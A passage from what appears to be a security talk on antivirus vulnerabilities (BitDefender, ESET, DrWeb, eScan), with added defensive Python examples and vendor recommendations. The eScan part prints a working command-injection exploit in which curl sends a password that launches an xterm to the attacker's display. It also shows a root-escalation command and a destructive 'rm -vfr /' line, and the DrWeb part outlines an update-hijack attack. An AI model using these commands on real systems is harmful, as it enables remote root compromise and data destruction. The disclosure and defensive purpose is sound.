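    if not (is_pow2(section_alignment) and section_alignment >= file_alignment):
        raise ValueError("bad SectionAlignment 0x%x" % section_alignment)
    return file_alignment, section_alignment

def checked_layout(image, raw_offset=0x28):
    fa, sa = checked_alignments(*read_alignments(image))
    return round_up(round_up(raw_offset, sa), fa)

def scan(image, hardened):
    """Run one layout computation and report the result or the failure type,
    so the two behaviours can be compared on the same input."""
    try:
        return (checked_layout if hardened else vulnerable_layout)(image)
    except (ZeroDivisionError, ValueError) as exc:
        return type(exc).__name__

def build_pe(file_alignment, section_alignment):
    """Constructed minimal PE32 header; only the fields read above are meaningful."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)   # i386, 1 section
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<II", opt, SECTION_ALIGNMENT_OFF, section_alignment, file_alignment)
    return bytes(dos) + PE_SIGNATURE + coff + bytes(opt)

if __name__ == "__main__":
    for fa, sa in ((0x200, 0x1000), (0x200, 0), (0, 0)):
        print("FileAlignment=%#x SectionAlignment=%#x -> vulnerable: %s, checked: %s"
              % (fa, sa, scan(build_pe(fa, sa), False), scan(build_pe(fa, sa), True)))
```

The `scan()` helper exists only to make the two outcomes comparable on identical headers; in a real engine the checked variant would reject the file before any unpacking buffer is sized from these values.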



One more complex BitDefender bug... 



(Vulnerability fixed) Modifying a single byte in a Thinstall installer would make it crash:



[Hex dump screenshots: the original Thinstall installer (21/08/13 02:20:24, 215,156 bytes) and the modified copy (16/09/13 10:02:51, 215,156 bytes, read-only), offsets 0x00006530 to 0x00006590; the two differ in a single byte.]



- After modifying one byte, the decompressed content became corrupt. An index into a table was calculated from the corrupted content... and data likely controlled by the attacker was copied to a position that was also likely controllable.

- Again: this bug was trivial to discover. TRIVIAL.



BitDefender notes 



■ This bug, and all of BitDefender's bugs, do not affect BitDefender's products exclusively.

■ They affect many other AV products out there, as previously mentioned.

■ Adding a third-party AV engine to your product may sound "cool", but you are making third-party bugs yours.

■ And, by the way, you didn't audit it before adding it to your product...

- Otherwise, I doubt you would have added it.






ESET Nod32 



. ESET Nod32 is a well known Slovak AV engine.

■ Like many other AV engines, it suffers from a number of vulnerabilities that can be trivially discovered.

■ One little example: a malformed PDF file.

- A negative or large value for any element of a /W (width) array used to crash it.

- A simple remote denial of service.



ESET Nod32 bug with PDF files 



[File listing screenshot: /revised_effective_date5-2010.pdf (23/03/14 17:45:20, 222,075 bytes) and the modified /revised_effective_date5-2010.pdf-sample (23/03/14 16:32:13, 222,113 bytes).]
According to ESET sources, they use fuzzing as part of QA.

- I think they are not doing it very well...

Finding this bug was trivial, like all the ones I previously showed.

This bug was reported and fixed by ESET.



Remote Code Execution 



DrWeb antivirus 



■ DrWeb is a Russian antivirus. It is used, for example, by the largest bank (Sberbank) and the largest search engine in Russia (Yandex), plus the Duma, to name a few customers.

■ More of their propaganda (the original web page I got this information from has been inaccessible since I disclosed just 1 vulnerability during SyScan 2014 Singapore):

Licenses and Certificates

Dr.Web is the only anti-virus certified by the Ministry of Defence of the Russian Federation,
the highest grade of certificate from the Government.

■ License of the Ministry of Defence of the Russian Federation, for activities related to information
security tools development

Dr.Web are certified by FSB (Federal Security Service) and FSTEC (Federal Service for
Technology and Export Control), which allow their use in organizations with high standards
of security.

■ License of the FSB Russia, for activities involving access to state secret information within Moscow
and Moscow region

■ License of the Centre for licensing, certification and state secret information protection of FSB
Russia, for development and/or publishing of tools for protection of classified information

■ License of the FSTEC for development of information security tools

■ License of the FSTEC for development and/or publishing of tools for protection of classified
information



DrWeb updating protocol 



. DrWeb used to update (still does?) via HTTP only. They do not use SSL/TLS.

■ It used to download a catalog file first:

- Example for Linux:

■ http://<server>/unix/700/drweb32.lst.lzma

- The catalog file listed a number of updatable files plus a hash for each of them:

. VDB files (Virus DataBases).
. DrWeb32.dll.

- The "hash" was simply a CRC32, and no component was signed, not even the DrWeb32.dll library.



DrWeb updating protocol 



. The "highest grade of certificate from the government" used to require the highest grade of checking for their virus database files and antivirus libraries: CRC32. Lol.

- To exploit it in a LAN, intercepting these domains was enough:

- update.nsk1.drweb.com

- update.drweb.com

- update.msk.drweb.com

- update.us.drweb.com

- update.msk5.drweb.com

- update.msk6.drweb.com

- update.fr1.drweb.com

- update.us1.drweb.com

- ...and replacing drweb32.dll with your "modified" (lzma'ed) version.



DrWeb updating protocol 



- Exploiting it was rather easy with ettercap, a quick Python web server and the Unix lzma tool.

■ You only need to calculate the CRC32 checksum and compress (lzma) the drweb32.dll file.

- I tested the bug under Linux: full code execution is possible.

■ Though you need to be in the LAN to be able to do so, obviously.

- One Russian guy wrote a Metasploit exploit for Windows:

- In my opinion, this updating protocol was (is?) horrible.
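The following is an added example, not Dr.Web's code: a Python model of the catalog-plus-checksum update flow described above. It shows that a CRC32 inside an unsigned catalog stops nothing, because the attacker who swaps the file simply regenerates the catalog, and what an authenticated catalog changes. The file names, the catalog line format and the key are assumed for the demonstration; HMAC-SHA256 stands in for an asymmetric signature so the example stays in the standard library (a real update client must verify a public-key signature, since it cannot hold the secret).

```python
"""Added example, not Dr.Web's code: CRC32-in-a-catalog versus an authenticated catalog."""
import hashlib
import hmac
import zlib

def crc32_hex(blob):
    return "%08x" % (zlib.crc32(blob) & 0xffffffff)

def sha256_hex(blob):
    return hashlib.sha256(blob).hexdigest()

def build_catalog(files, strong=False):
    """Vendor side: one line per updatable file, 'name checksum'.
    strong=False mirrors the original scheme (CRC32); strong=True uses SHA-256."""
    digest = sha256_hex if strong else crc32_hex
    return "\n".join("%s %s" % (name, digest(blob)) for name, blob in sorted(files.items()))

def files_match_catalog(catalog, files, strong=False):
    """The per-file check a client can do with the catalog alone."""
    digest = sha256_hex if strong else crc32_hex
    for line in catalog.splitlines():
        name, expected = line.split(" ", 1)
        if name not in files or digest(files[name]) != expected:
            return False
    return True

def mitm_replace(files, name, payload):
    """Attacker on the LAN path: swap one file and regenerate the catalog.
    No secret is involved, so a CRC-only client accepts the result."""
    files = dict(files)
    files[name] = payload
    return build_catalog(files), files

# Authenticated variant: a tag over the whole catalog, appended after a marker.
SIG_MARKER = b"\n--sig "

def sign_catalog(catalog, key):
    body = catalog.encode()
    return body + SIG_MARKER + hmac.new(key, body, hashlib.sha256).hexdigest().encode()

def client_accepts_signed(signed, files, key):
    """Verify the tag over the whole catalog, then the per-file hashes.
    Splitting on the last marker means anything appended after the tag becomes
    part of the tag and fails the comparison: the 'nothing after the signature' rule."""
    body, marker, tag = signed.rpartition(SIG_MARKER)
    if not marker:
        return False
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        return False
    return files_match_catalog(body.decode(), files, strong=True)

# Constructed sample update set standing in for the contents of drweb32.lst.
SAMPLE_FILES = {
    "drweb32.dll": b"\x7fELF legitimate engine library",
    "drwtoday.vdb": b"virus database records",
}
VENDOR_KEY = b"assumed-vendor-signing-key"   # assumption: held by the vendor only

if __name__ == "__main__":
    catalog = build_catalog(SAMPLE_FILES)
    evil_catalog, evil_files = mitm_replace(SAMPLE_FILES, "drweb32.dll", b"\x7fELF attacker library")
    print("CRC-only client accepts swapped DLL:", files_match_catalog(evil_catalog, evil_files))
    signed = sign_catalog(build_catalog(SAMPLE_FILES, strong=True), VENDOR_KEY)
    print("signed client accepts swapped DLL:", client_accepts_signed(signed, evil_files, VENDOR_KEY))
```

The two checks fail for different reasons, and both matter: with the genuine signed catalog the swapped DLL fails the per-file hash, and a catalog the attacker regenerates and "signs" with a guessed key fails the tag. Transport security (TLS) on top of this protects the download from being observed or tampered with in flight, but the signature is what lets the client refuse a bad update regardless of how it arrived.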



DrWeb updating protocol vulnerability 



The vulnerability was fixed and "an alert" issued.

In the "alert" they do not say they fixed a vulnerability.

- The alert is not available in English, only in Russian and, I think, Chinese.

They only said that changes were made to increase the security of the update procedure.

■ Technically true: From no security to some security. 

I did not research the update. It can be fun as I'm 99% 
sure they are doing it wrong. 

■ I had no time to check for this conference, sorry :( 



eScan for Linux 



■ I was bored some random night in Singapore and found that the eScan product has a Linux version.

■ I downloaded and installed it (~1 hour because of the awful hotel connection).

■ Then I started checking what it installs, looking for SUID binaries, etc...

- They use the BitDefender and ClamAV engines; they don't have their own engine, so there was no need to test the scanners.

- I already had vulnerabilities for those engines...

■ They install a web server for management and a SUID binary called:

■ /opt/MicroWorld/sbin/runasroot



eScan for Linux 



■ The SUID binary allows the following users to execute commands as root:

- root

- mwconf (created during installation).

■ The eScan management application (called MwAdmin) is so flawed that I decided to stop at the first RCE... It was fixed recently.

- A command injection in the login form (PHP).
■ In a "security" product.

- Yes.



eScan for Linux login page 




[Screenshot of the eScan for Linux login form: fields Username (Email-id), Password, Product name (Select product) and Language (English); buttons Forgot Password, Login and Reset.]



eScan for Linux remote root 



■ This specific bug required knowing or guessing an existing user. Not so hard.

- People from Immunity discovered more bugs that didn't require guessing a user name, and used this application as a vuln-hunting teaching tool.

- The application is buggy as hell. It's only good for learning what not to do, or how to write easy exploits, as a tutorial.

■ The user name and the password were used to construct an operating system command executed via PHP's "exec" function.

. I was not able to inject in the user name.
. But I was able to inject in the password.



Source code of login.php (I)

if (isvalid_emailid_single($username) != 0)
{
    header("Location: index.php?err_msg=user");
    exit();
}
elseif( strlen($passwd) < 5 )
{
    header("Location: index.php?err_msg=password_len");
    exit();
}
else
{
    $retval = check_user($username, "NULL", $passwdFile, "NULL");
    list($k, $v) = explode("-", $retval);
    if($v == 0)
    {
        header("Location: index.php?err_msg=usernotexists");
        exit();
    }
    elseif( strlen($passwd) < 5 )
    {
        header("Location: index.php?err_msg=password_len");
        exit();
    }
    elseif( preg_match('/[ |&)(!><\"\' ]/', $passwd) )
    {
        header("Location: index.php?err_msg=password_chars");
        exit();
    }



Source code of login.php (II)

- The password sent by the user was passed to check_user:

    }
    elseif( preg_match('/[ |&)(!><\"\' ]/', $passwd) )
    {
        header("Location: index.php?err_msg=password_chars");
        exit();
    }
    else
    {
        $retval = check_user($username, $passwd, $passwdFile, "USERS");
        list($k, $v) = explode("-", $retval);
        if($v == 0)

- There were some very basic checks on the password.

- Especially for shell escape characters.

- But they forgot various other characters like


Source code of common_functions.php 



■ Then, the given password was used in the function check_user like this:

function check_user($uname, $password, $passfile, $product)
{
    // name and path of the binary
    $prog = "/opt/MicroWorld/sbin/checkpass";
    $runasroot = "/opt/MicroWorld/sbin/runasroot";

    unset($output);
    unset($ret);

    // name and path of the passwd file
    $out = exec("$runasroot $prog $uname $password $passfile $product", $output, $ret);

    $val = $output[0]."-".$ret;
    return $val;
}





eScan for Linux RCE 



- My super-ultra-very-txupi-complex exploit for it:

$ xhost +
$ export TARGET=http://target:10080
$ curl --data "product=1&uname=valid@user.com&pass=1234567;DISPLAY=YOURIP:0;xterm;" $TARGET/login.php

- Once you're in, run this to escalate privileges:

$ /opt/MicroWorld/sbin/runasroot /usr/bin/xterm

. Or anything else you want...

$ /opt/MicroWorld/sbin/runasroot rm -vfr /
Conclusions



. In general, AV software...

■ ...doesn't make you any safer against skilled attackers.

■ ...increases your attack surface.

■ ...makes you more vulnerable to skilled attackers.

■ ...is as vulnerable to attacks as any other application.

- Some AV software...

■ ...may lower your operating system's protections.

■ ...is plagued with both local and remote vulnerabilities.

- Some AV companies...

■ ...don't give a fuck about security in their products.



Breaking antivirus software 



Introduction 

Attacking antivirus engines 
Finding vulnerabilities 
Exploiting antivirus engines 
Antivirus vulnerabilities 
Conclusions 
Recommendations 



Recommendations for AV users 



Do not blindly trust your AV product. 

- BTW, do not trust your AV product. 

- Also, do not trust your AV product. 

- Nope. I cannot stress it enough. 

Isolate the machines with AV engines used for 
gateways, network inspection, etc... 

Audit your AV engine or ask a 3rd party to audit 
the AV engine you want to deploy in your 
organization. 



Recommendations for AV companies 



■ Audit your products: source code reviews & fuzzing. 

. No, AV comparatives and the like are not even remotely 
close to this. 

. Running a Bug Bounty, like Avast, is a very good idea too. 

■ Do not use the highest privileges possible for scanning 
network packets, files, etc... 

- You don't need to be root/system to scan a network packet 
or a file. 

. You only need root/system to get the contents of that packet 
or file. 

- Send the network packet or file contents to another, low 
privileged or sandboxed, process. 



Recommendations for AV companies 



. Run dangerous code under an emulator, vm or, at the very 
least, in a sandbox. I only know 1 AV using this approach. 

- The file parsers written in C/C++ code are very dangerous. 

- If one finds a vulnerability and it's running inside an emulator/ 
sandbox one needs also an escape vulnerability to completely 
own the AV engine. 

- Why is it harder to exploit browsers than security 
products? 

- Or use a "safer" language. Some AV products, actually, are doing 
this: Using Lua, for example. 

- Do not trust your own processes. They can be owned. 

- I'm not talking about signing the files. 

■ I'm talking about your AV's running processes. 
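The following is an added example, not any vendor's code: the separated, bounded scanning worker that the recommendations above describe (hand the bytes to another process, keep the privileged side out of the parser), written in Python for POSIX. The "scanner" is a stand-in that inflates a zlib stream with a hard output cap, which is also the check that defuses the compressed-bomb denial of service from the "Failing AVs" section. A worker crash or a runaway input is reported to the parent instead of taking it down. The cap, the CPU budget and the "CRASH" trigger that stands in for a parser bug are assumptions for the demonstration.

```python
"""Added example, not from any AV engine: parse untrusted input in a forked,
resource-limited worker and report outcomes to the privileged parent."""
import os
import resource
import signal
import zlib

MAX_INFLATED = 1 << 20      # assumed cap: at most 1 MiB of output per stream
CPU_SECONDS = 5             # assumed CPU budget for one scan

def bounded_inflate(blob, cap=MAX_INFLATED):
    """Inflate at most `cap` bytes and refuse streams that want to go further."""
    d = zlib.decompressobj()
    out = d.decompress(blob, cap)
    if d.unconsumed_tail or not d.eof:
        raise ValueError("compressed data expands beyond %d bytes" % cap)
    return out

def _limit_cpu(seconds):
    """Lower the soft CPU limit without trying to raise the hard one."""
    soft, hard = resource.getrlimit(resource.RLIMIT_CPU)
    if hard != resource.RLIM_INFINITY:
        seconds = min(seconds, hard)
    resource.setrlimit(resource.RLIMIT_CPU, (seconds, hard))

def scan_in_worker(blob):
    """Parse `blob` in a forked worker; the parent only reads a short report.
    Returns ("ok", inflated_size), ("rejected", reason) or ("crashed", detail)."""
    r, w = os.pipe()
    pid = os.fork()
    if pid == 0:                                  # worker: the untrusted parsing side
        os.close(r)
        _limit_cpu(CPU_SECONDS)
        # A real engine would also setuid()/setgid() to an unprivileged account,
        # chroot() or enter a namespace, and install a seccomp filter here;
        # omitted because this example does not run as root.
        try:
            if blob.startswith(b"CRASH"):         # constructed trigger standing in for a parser bug
                os.abort()
            size = len(bounded_inflate(blob))
            os.write(w, b"ok %d" % size)
        except Exception as exc:
            os.write(w, b"rejected " + str(exc).encode())
        finally:
            os._exit(0)
    os.close(w)                                   # parent: the privileged side
    with os.fdopen(r, "rb") as pipe:
        report = pipe.read()                      # EOF once the worker exits, however it exits
    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status):
        return ("crashed", signal.Signals(os.WTERMSIG(status)).name)
    if not report:
        return ("crashed", "exit status %d" % os.WEXITSTATUS(status))
    kind, _, detail = report.decode(errors="replace").partition(" ")
    return (kind, int(detail) if kind == "ok" else detail)

def benign_sample():
    """Constructed: a small stream that inflates to 500 bytes."""
    return zlib.compress(b"hello" * 100)

def bomb_sample(size=16 << 20):
    """Constructed: 16 MiB of zeros, a few KiB compressed; the 32 GB-from-3 MB idea in miniature."""
    return zlib.compress(bytes(size))

if __name__ == "__main__":
    for label, sample in (("benign", benign_sample()), ("bomb", bomb_sample()),
                          ("parser bug", b"CRASH" + b"\x00" * 16), ("garbage", b"not a zlib stream")):
        print("%-10s -> %s" % (label, scan_in_worker(sample)))
```

The parent never touches the parser and never sees more than a short report, so a memory-corruption bug in the worker is worth a crash report rather than root. The output cap is the part that matters for the archive-bomb case: an engine that inflates without a bound spends the time and memory the attacker chose, whether or not it is sandboxed.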



Recommendations for AV companies 



■ Do not use plain HTTP for updating your 
product. 

- Use SSL/TLS. 

- Also, digitally sign all files. 

■ No, CRC is not a signature. Really. 

- ...and verify there is nothing else after the signature. 

- Also, verify the whole certification chain... 



Recommendations for AV companies 



- Drop old code that is of no use today, or make that code unavailable by default.

■ Code for MS-DOS era viruses, packers, protectors, etc...

■ Parsers for file format vulnerabilities in products that are completely unsupported nowadays.

- Such old code, not touched in years, is likely to have vulnerabilities.

- Ignore any antivirus comparative company asking you to detect malware from the Jurassic era. Avoid them.



